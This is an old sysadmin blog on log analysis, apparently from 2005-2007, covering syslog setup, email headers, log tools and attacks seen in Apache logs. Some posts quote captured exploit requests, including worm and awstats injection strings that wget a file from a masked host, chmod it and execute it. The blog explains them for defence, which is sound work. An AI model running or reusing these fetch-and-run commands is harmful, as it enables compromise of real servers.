Thursday, January 11, 2007

More log analysis posts to come

After a long break, I will be posting more about log analysis here again. Hopefully some readers will find my postings about analyzing logs useful. Next up will be ethereal, tcpdump and some other network packet capturing tools. Analyzing network traffic can be a hand full, but there are some great tools and scripts out there to help us. With ethereal you can do pretty much everything with your collected network data logs. Lot's of handy filters and custom made colouring of different types of protocols makes it very readable. So stay tuned if you are in to logs.

Tuesday, April 25, 2006

Web Server Log Analysis

Tracking down malicious activity in Web server log files is rather easy, if you have configured your web server correctly. Meaning that you have configured your web server to audit web server traffic, such as ip address, date, kind of http request and what page your webserver have served etc. If you have any experience in setting up an apache server, you should have seen appropriate logs your /var directory. The directory for the logs differs from OS and distributions of course.

What to look for?

Suspicious entries to be found examples.

' Single Ticks is used in SQL injection attacks.
../ Directory Traversal. Different Encodings.
/etc/shadow is nothing you want to see a 200 request on. 200 means successfull GET request.

All kinds of shell paths.


On Windows


| pipes, semicolons

ASCII control characters


Lot's of 404 or 500 responses from your webserver might indicate a vulnerability
scan of your server.

Buffer Overflow Attempts. Anti-IDS method
Repeated Characters,

From here you can use grep, perl, python or shell scripts to process the information in your logs.

Syslog, Setting Up Your Own Syslog Server

A simple guide to setup you own Syslog Server.

Building your own Syslog Environment.

Ever wanted to collect those local system logs to one
place? Setting up your Unix/Linux/Windows Machines to log
to one dedicated Syslog server is actually very easy.

#### Setting up the Syslog Server. ####

First out, you will need simple machine, preferably running
some Unix dialect, with Syslog or Syslog-Ng installed.

The Syslog daemon is most likely running on your system already,
but to make sure, check for it's presence with a ps -ef| grep syslogd

# ps -ef | grep syslogd
root 2153 1 0 Apr19 ? 00:00:00 syslogd -m 0
salt 15126 15125 0 15:29 pts/0 00:00:00 /bin/bash -c ps -ef| grep syslogd

# If syslogd is running, you and you want to be able to receive log messages from
the network, you will have to run syslogd with the -r option. Edit the /etc/sysconfig/syslog
file to make the changes permanent.

# vi /etc/sysconfig/syslog

# Options to syslogd
# -m 0 disables 'MARK' messages.
# -r enables logging from remote machines
# -x disables DNS lookups on messages recieved with -r
# See syslogd(8) for more details
# Options to klogd
# -2 prints all kernel oops messages twice; once for klogd to decode, and
# once for processing with 'ksymoops'
# -x disables all klogd processing of oops messages entirely
# See klogd(8) for more details


Add the -r option on line 6 after SYSLOGD_OPTIONS="-m 0" so it says SYSLOGD_OPTIONS="-m 0 -r"
Restart your syslog server.

# /etc/init.d/syslogd restart

Your systems should now be able to collect those network logs.

#### Edit your Client to send logdata to the Syslog server ####

After checking for syslogd, edit the syslog.conf file, under /etc/syslog.conf
Just add @syslogserver <-- after *.* for example and restart your syslogd daemon.
Don't bother about the wildcard *.* for now, you can tune that later on.

Now as user root.

# vi /etc/syslog.conf

# Log all kernel messages to the console.
# Logging much else clutters up the screen.
kern.* /dev/console

# Log anything (except mail) of level info or higher.
# Don't log private authentication messages!
# *.info;mail.none;authpriv.none;cron.none /var/log/messages
*.* @syslogserver <-- EDIT Rec SYSLOGSERVER ADDRESS

# The authpriv file has restricted access.
authpriv.* /var/log/secure

# Log all the mail messages in one place.
mail.* -/var/log/maillog

# Log cron stuff
cron.* /var/log/cron

# Everybody gets emergency messages
*.emerg *

# Save news errors of level crit and higher in a special file.
uucp,news.crit /var/log/spooler

# Save boot messages also to boot.log
local7.* /var/log/boot.log

After adding *.* at and @syslogserver to line 7, see what kind of logs I get.
But don't forget to restart your syslog daemon first. It will need to re-read
your syslog.conf file.

# /etc/init.d/syslogd restart

You should now be able to see incoming logdata on your syslogserver.
# tail -f /var/log/messages


Thursday, March 09, 2006

Buffer Overflow attempt fp30reg.dll apache log. Old Hack, same logs

During my years as an Unix System administrator, I have had my share of logs, and
log analysis. Especially from staring at webservers and mail servers log entries.
These poor server are usually in a DMZ or at the front of the line, right before
internet, and total exposure to

Of all the logs you go through, most of them contain ordinary GET /something request,
with webserver reply of 202.So when you see a SEARCH in your access logs, you kind
of raise an eyebrow. This log shows an automated, from an infected host.

The attack code, (a buffer overflow in this and many other cases) has the
purpose to do the "break in". The xc9 are NOPs, (no operation) Attempts to
overflow the fp30reg.dll.

What's most scary about this attack, is that it's still in use, meaning there is
vulnerable systems out there, even though the vulnerability was announced as
Critical by Mircosoft back in Nov 2003!! Only G*d knows how long the black hats
have had the code before Mircosoft. [09/Mar/2006:16:54:38 +0100]

414 339 "-" "-" - - [09/Mar/2006:16:54:38 +0100]
"GET / HTTP/1.0" 200 251213 "-" "-" - - [09/Mar/2006:16:55:09 +0100]
"POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 316 "-" "-"

This attack code is trying to exploit, with a buffer overflow, a known vulnerability
in Microsoft IIS running Frontpage extensions,
and totally harmless to Unix system running apache.

Monday, March 06, 2006

Dissecting Email Headers, Part I

This is just to simple little guide. Nothing fancy, I'm not going to dig into all the MTA/SMTP and mail routing, just show you one example of the traces SMTP traffic leaves behind.

Have you ever wondered where you can find the source ip address in an email?
Here is a mini howto in dissecting mail headers.

In Gmail, you can open up the headers by "clicking" at the "More Options" in an opened email, and then
"Show original". This will open up a new browser window, with your email in pure 7-bit ascii.

Email Headers are like the front of an envelope or back of postcard.
The "stamps" are made by the involved SMTP servers, used in the transmission of the email.
The header show the stamps in the order from the bottom and up.

Working your way from the bottom (or middle) of the email header towards the top is the path taken to get from t
he source to the destination. Finding the source ip address is usually easy. Just find the field that says X-Ori
ginating-IP or something similar. It sometimes differs from mail servers. There is however a standard for this i
n RFC 822.

Dissecting Email Headers, part II

Part II

Received-SPF: pass ( domain of designates as permitted sender)
Received: from mail pickup service by with Microsoft SMTPSVC;
Sat, 4 Mar 2006 11:20:43 -0800
Received: from by with HTTP;
Sat, 04 Mar 2006 19:20:40 GMT
X-Originating-IP: [X.236.92.250] <- Senders ip address
X-Originating-Email: []
X-Sender: <- Here you could see something like "Outlook, Eudora, Evolution etc)
In-Reply-To: <>
From: "Mail Senderson"
Subject:SMTP message
Date: Sat, 04 Mar 2006 19:20:40 +0000
Mime-Version: 1.0
Content-Type: text/html; format=flowed
X-OriginalArrivalTime: 04 Mar 2006 19:20:43.0290 (UTC) FILETIME=[BB2877A0:01C63FC0]

Messages goes here................

Dissecting Email Headers, part III

Part III
Definitions and Glossary:

SMTP Simple Mail Transfer Protocol (RFC 822). For transmission of mail across the internet.
MIME Multipurpose Internet Mail Extensions, is an Internet standard specifying message formats for transmissionof different types of data by electronic mail.

SPF technology was designed to make the sending of spam/virus messages with faked domain names more difficult. It is like "reverse MX" DNS record which identifies a domain name with a server from which this domain sends itsmessages.

Message ID The unique id every email is provided by the receiving MTA. On Unix systems, usually based on Unix Time.

MTA Mail Transport/Transfer Agent (SMTP) Mail routing, relaying.

Ok, so you found the X-Originating-IP. Now what?
Well, if you are curious, you can traceroute the ip address and check the route each packet takes from
the sending email system to the receiving email system. You can do a whois on the ip address to see how owns that particular ip address range. Or if it is an abuse case, you can copy the header an mail it to the senders mail domain for a complaint. The complaint/abuse address should be If this
address bounces, try

Remember, if the mail is of the abuse character, you should be aware of that the X-originating ip address most likely is faked/spoofed.

Wednesday, March 01, 2006

Log analyze xmlrpc xmlsrv 404 requests Linux Worm

A not to uncommon log post in my apache access log files. Exploit code has been out in the wild for
quite some time. But the world of security patching is still even with the constant releases of malware.

This is a no-brainer. Host "infected-server-host" (Changed the ip to protect the innocent), is
running automated scripts (might be manually operated aswell) against possible targets, vulnerable to known xmlsrv, xmlrpc, mambo attacks. First 3 lines shows something interesting.

infected-server-host - - [23/Feb/2006:03:09:05 +0100] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS
%20XXX.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1
" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:07 +0100] "POST /xmlrpc.php HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
infected-server-host - - [23/Feb/2006:03:09:08 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
infected-server-host - - [23/Feb/2006:03:09:13 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Win
dows NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:14 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Wi
ndows NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:16 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows
NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:17 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Wi
ndows NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:19 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windo
ws NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:21 +0100] "POST /xmlrpc.php HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
infected-server-host - - [23/Feb/2006:03:09:22 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows
NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:23 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows
NT 5.1;)"

This worm is also know as
Linux/Lupper.worm.a [McAfee], Linux/Lupper.A [Computer Associates], Linux/Lupper.B [Computer Associates], [Kaspersky], Exploit.Linux.Lupii [ClamAV], ELF_LUPPER.A [Trend Micro].

The worm is trying to use the XML-RPC for PHP Remote Code Injection Vulnerability.
Vulnerable systems and complete information can be found here Security Focus
Xoops, Wordpress, Ubuntu, Red Hat, SuSE.

Countermeasures: Upgrades are available for most applications that uses the xml-rpc. Check the application official site for upgrades, patches.

Technorati Tags:
, , , , , , , Tags:
, , , , , , ,

Tuesday, February 07, 2006

Known awstats ( Vulnerability Logs - Update

The last 2 weeks my httpd/apache access_log has been showered with GET requests, trying to exploit a know vulnerability in awstats 6.3 and prior. This has been resolved in version 6.5 of awstats, so upgrade.

Awstats is a great log tool that generates advanced graphical statistics from your server logs. I have used it on many of my sites to generate graphical statistics.

However a vulnerability has been identified in awstats (< 6.3), it could be exploited by attackers to execute arbitrary code and compromise a vulnerable system. The problem results from an input validation error in the "" file when handling the "configdir" parameter, which can be exploited by attackers to execute arbitrary command using "|" characters.)

So if you run use awstats on your webserver and find these kind of logs in your access_log you
should take action and consider your machine as compromised. Upgrade to awstats version 6.5 immediately or asap. Version 6.5 is available for download.

Typical Exploit Attempt For
GET /awstats/|echo;echo%20YYY;cd%20%2ftmp%3bw
echo| HTTP/1.1\n
Request Method: GET
Request URI: /awstats/|echo;echo%20YYY;cd%20%2ftmp%3b

Explanation: If you are familiar with Unix/Linux you should be able to strip out the commands that this string contains. First out after the GET request is the path to awstats (cgi script, written in perl) can be used from the command line too.

So after|echo;, you should see the %20YYY;cd <- (cd = change directory in Unix) to /tmp. Then wget (utility for non-interactive download of files from
the Web. It supports HTTP, HTTPS, and FTP protocols, as well as
retrieval through HTTP proxies.) wget (ip address)/listen, then change mode command chmod.
chmod listen (file) (listen file = netcat?) I will have to find out and get back on that one.
So check for an update in this posting if you are interested.

Technorati Tags:
, , , , , , , , , , , ,

Friday, February 03, 2006

Log parser review. The "forgotten" power tool?

Logparser 2.0.

Logparser 2.0 has been around since 2002, but you hardly ever hear anyone talking about it. This is a great tool for parsing logs,
if you get to know it. Logparser comes with a huge amount of options and flags, and as far as I know, no GUI, (Graphical User Interface), which might scare of some administrators. I am from the world of Unix, and command line freak, so the CLI that logparser
offers, is just perfect. (No CLI vs GUI flames, please).

As this is a blog, I will not go into every detail about Logparser. You will have to explore it yourself. I do recommend it, it is really a powertool for Windows Administrators and Expert users, with the ability to give you a good overview of all the logs your machines
are producing. You could write batchjobs to parse your Event Log, the Registry, the file system, and Active Directory®,
and have it mailed to you every morning. Would not that be nice? The results of your query can also be custom-formatted in text based output, or they can be persisted to more specialty targets like SQL, SYSLOG, or a chart.

With some tweaking, you could make your log queries and results "management" understandable, and have the output of your
loganalyze to a human readable format.

Not to scare you off logparser, but here is all the flags you will be able to use:

C:\Program\Log Parser>logparser

Microsoft (R) Log Parser Version 2.0
Copyright (C) 2002 Microsoft Corporation. All rights reserved.

Usage: LogParser [-i:] [-o:]
| file:
[] []
[-q[:ON|OFF]] [-e:] [-iw[:ON|OFF]]

LogParser -c -i: -o:
[] []
[] [-multisite[:ON|OFF]
[-q[:ON|OFF]] [-e:] [-iw[:ON|OFF]]

FS (if omitted, will guess from the FROM clause)
-o: : one of CSV, XML, NAT, W3C, IIS, SQL, TPL, NULL (if
omitted, will guess from the TO clause)
-q[:ON|OFF] : quiet mode; default is OFF
-e: : max # of parse errors before aborting; default is -1
(ignore all)
-iw[:ON|OFF] : ignore warnings; default is OFF
-stats[:ON|OFF] : dump stats after executing query; default is ON
-c : use built-in conversion query
-multisite[:ON|OFF] : send BIN conversion output to multiple files
depending on the SiteID value; default is OFF

LogParser "SELECT date, REVERSEDNS(c-ip) AS Client, COUNT(*) FROM file.log
WHERE sc-status<>200 GROUP BY date, Client" -e:10
LogParser -c -i:BIN -o:W3C file1.log file2.log "ComputerName IS NOT NULL"

-h 1 : SQL Language Grammar
-h 2 [ ] : Functions Syntax
-h 3 : Example queries
-h -i: : Help on
-h -o: : Help on
-h -c : Conversion help

"Most software is designed to accomplish a limited number of specific tasks. Log Parser is different... the number of ways it can be used is limited only by the needs and imagination of the user. The world is your database with Log Parser."

Wednesday, February 01, 2006

Online pen-test tools, How secure are you and your clients/servers?

Online pen-test tools

traceroute - print the route packets take to network host
Uses the IP protocol time to live field and attempts to elicit an ICMP TIME_EXCEEDED response from each gateway along the path to some host.
(shows all the routers hops between host A to B. Useful for problemshooting network
problems, mapping network infrastructure etc.. On Unix/Linux systems you can use traceroute with the -I flag, which is an ICMP flag. Traceroute uses UDP packets by default. As UDP (User Datagram Protocol)is a stateless protocol, and with low priority for routing protocols. This means that the if the load between
two networks are heavy, the routers will drop the traceroute UDP packets with ease.

[salt@mimir ~]$ /usr/sbin/traceroute -I host_to_traceroute Version 1.4a12

Usage: traceroute [-dFInrvx] [-g gateway] [-i iface] [-f first_ttl]

[-m max_ttl] [ -p port] [-q nqueries] [-s src_addr] [-t tos]

[-w waittime] [-z pausemsecs] host [packetlen]

Online Traceroute can be found here

Online Perimeter and Content Scanning
Linux Sec Dot Net.

Lots of online tools, Use with care, abuse is and will not be tolerated.

Online port scanners, nessus scanners, dns scanners, apache scanners, firewall testers, open relay tests,
virus scanners and much more..

Technorati Tags:
, , , , , , , , , , ,

Technorati Tags:
, ,

Wednesday, January 25, 2006

Fwanalog, analys your firewall logs now!

I have tried out fwanalog some time ago, and I am really impressed of the work the coder has done with shell scripts. If you consider the commercial software CheckPoint sells, (Reporter), you will
find this tool alot more useful. So start parsing your firewall logs today!

fwanalog is a shell script that parses and summarizes firewall logfiles. It currently (version 0.6.9) understands logs from ipf (tested with OpenBSD 2.8's and 2.9's ipf, also FreeBSD, NetBSD and Solaris 8 with ipf (+ ipfw on FreeBSD)), OpenBSD 3.x pf, Linux 2.2 ipchains, Linux 2.4 iptables, some ZyXEL/NetGear routers and Cisco PIX, Watchguard Firebox, Firewall-One (not NG!), FreeBSD ipfw and Sonicwall firewalls.

(You might need to change the shebang line to bash on non-free Unixes that don't ship with a powerful enough /bin/sh.)

It can be easily extended for other logfile formats, all it takes is editing two regular expressions.

fwanalog uses the excellent log analysis program Analog (also free software) to create its reports. It does so by converting the firewall log into a fake web server log and calling Analog with a modified configuration.

Technorati Tags:
, , , , , , , , ,

Thursday, January 12, 2006

A heavy flaw in WMF has been reported.

A heavy flaw in WMF has been reported.

The WMF vulnerability uses images (WMF images) to execute arbitrary
code. It will execute just by viewing the image. In most cases, you
don't have click anything. Even images stored on your system may cause
the exploit to be triggered if it is indexed by some indexing
software. Viewing a directory in Explorer with 'Icon size' images will
cause the exploit to be triggered as well. Microsoft announced that an
official patch will not be available before January 10th 2006 (next
regular update cycle). But there several workarounds available. This
is one of them. I haven't tested this Hotfix, so I can't guarantee
anything, but the guys at SANS usually know what they're doing.

MSI WMF Hotfix link

More information about the WMF flaw can be found at isc.sans.or

Technorati Tags: , , , ,

Splunk review (free version)

Tried out the Splunkserver , (Red Hat Enterprise Server 4, Kernel 2.6.9-5.EL)
(Splunk Server version 1.1 build 3772) to be exact
and the first review concerns installation, look and feel.

I am an experienced Unix/Linux Sys Admin, but the installation was a just a kick, and the installation script gave me options with yes or no, which made it extremely easy to install. Just chmod splunk-Server-1.1-linux-installer.bin (chmod +x) so it's excecutable and start the install phase with # ./splunk-Server-1.1-linux-installer.bin.

Starting the Splunkserver was as easy. Run the splunk Bourne Shell Script as follows,

[root@mimir splunk]# /opt/splunk/bin/splunk start
== Checking prerequisites...
Version is Splunk Server
Checking http port [8000]: open
Checking https port [8001]: open
Checking mgmt port [8089]: open
Checking search port [9099]: open
== All checks passed
Starting splunkd [ OK ]
Starting splunkSearch [ OK ]

You might have a problem with the ports, as your local firewall, that you have enabled (yes, a must have) will not let you connect to these ports by default. If you're connecting thru localhost, this shouldn't be much of a problem.

Check out netfilter/iptables for localhost access otherwise. You are also able to choose other ports, that may suit your firewall needs better. Just be sure that the are not taken buy another service.

As I am an IT security freak, I don't want any ports to bind to my external face (internet) if avoidable, so I would recommend defending these ports with appropriate firewall rules, before playing around with the web interface.

So don't allow any internet sources to connect to port 8000/tcp, 8001/tcp, 8089/tcp 9099/tcp. You might need to open up them later, for communications with other syslog facilities. But wait until you've got familiar with Splunk, and how it works.

Connecting to the webserver interface is easy, just add the port 8000 to your URL, and you will land right on the Splunk user interface. You will be greeted with "Welcome to Splunk" and see some configuration options. So fire up firefox/IE against yourhost:8000 and browse.

To get started, click on Index a file now, and upload a file in syslog format, ex. /var/log/messages. The file will be indexed and viewable in a second. That depends on the size and the CPU power of course, but 40 MB of files was done in a flash with my workstation.

From here on, you can now browse all your log messages in a beautifully structured and intelligent way. Click on the file you let Splunk process, and have a look. Mmmm, a sys admins wet dream.

Ok, that's all for now, I will post part II later this week, when I have had the time to try it out with searches, tags and some of the advanced features it offers. Sure looks promising.
I will try and see if I can configure snort data to be processed aswell.

So for now, keep your /var/log/ in shape, and don't throw away any UDP with destination 514.
Splunk Offical Website


Technorati Tags: , , , ,

Tuesday, January 03, 2006

Log parsers

Here you will find links to the log parsers I've been using thru the years. I will drop a few beta:s of my own developed log parsing/analyzing tools asap. Some methods for forensics and intrusion detections will also be covered. This is a huge topic, so I can't post everything I've read or know, but you'll get logs from intrusion attempets and their likings, that I can guarantee.

Ok, may the code be stable, and the syslog up and running. Don't forget to make sure that your systems wtmp is in place. LoL


Analyzing logs. Tools and methods.

About time that I check out Splunk and their selfproclaimed awesome logtool. It sure looks promising, and for a wet dream for all System Administrators.

Excerpt from Splunk's website.

What Splunk can do for you?

  • System administrators can find the root cause of problems quickly and locate latent systems issues before they cause downtime.
  • Developers can debug interactions among multiple tiers and components in the code-test cycle, the migration from development to production or during production escalations.
  • Help desk and support teams can investigate reported incidents and alerts right away without having to reproduce the problem or call in senior analysts or developers.
So right now, I will kickstart an installation of Splunk and check out all the nitty gritty techie stuff.
Next out is syslog next generation aka syslog-ng. Unix syslog will of course be covered, but at a later time.

Parse your logs with care, and alway make backups before you sed/awk the cr.p out of them.



Notes: analyse, (analyze US)

Wednesday, December 28, 2005

http access_log analys part 1

Part 1 in log analysis I will provide you with some useful http logs, and try and anlyse them, and if possible correlate them.

First of all, the logs that I provide are all from Linux systems, but the logs should be similar if you're running apache on a windows box. (Which you should try to avoid if possible).

The logs from this site, has a few hundred unique visitors a month, and not loaded with lots of traffic, so It's quit easy to go thru these logs manullay and with some small scripts. This is to get a better understanding of the logging format and how you can learn to identify malicious traffic that your httpd daemon logged.

It's very common to find logs like these in your httpd access log; - - [21/Nov/2005:13:23:18 +0100] "GET / HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.7.12) Gecko/2
0050919 Firefox/1.0.7" - - [21/Nov/2005:13:23:18 +0100] "GET /favicon.ico HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.
7.12) Gecko/20050919 Firefox/1.0.7" - - [21/Nov/2005:13:23:45 +0100] "GET / HTTP/1.1" 403 63 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.7.12) Gecko/
20050919 Firefox/1.0.7" - - [21/Nov/2005:13:23:46 +0100] "GET /favicon.ico HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.
7.12) Gecko/20050919 Firefox/1.0.7"

These are ordinary http GET requests and should be treated like vanila traffic. These are usefull for statistics and info gathering about your visitors. There is a bunch of good web analys tools out there, that can easily accomplish the task of presenting the log data in more human readable form.
Webalizer is one of such tools, and it's installed by default in many Linux distributions along with Apache.
Usually you can find Webalizer's script output under /var/www/usage or similar.

The cron job (for Webalizer) is found under /etc/cron.daily/00webalizer. The script looks like this;

#! /bin/bash
# update access statistics for the web site

if [ -s /var/log/httpd/access_log ] ; then

exit 0

A simple bash script that calls the webalizer binary (/usr/bin/webalizer) and parses the access_log file under /var/log/httpd/. So remember to change the PATH or the name of the access_log file if you don't run the default prefixes.

End of part I

To be continued ....

Monday, December 12, 2005

Friday, December 09, 2005

About Loganalysis

This blog is going to give you a helping hand in analysing lots of different logs from all kinds of platforms.
I will provide a submit your log script soon, with which you can submit logs you know about, and want to
share with the rest of the internet.

Best Regards,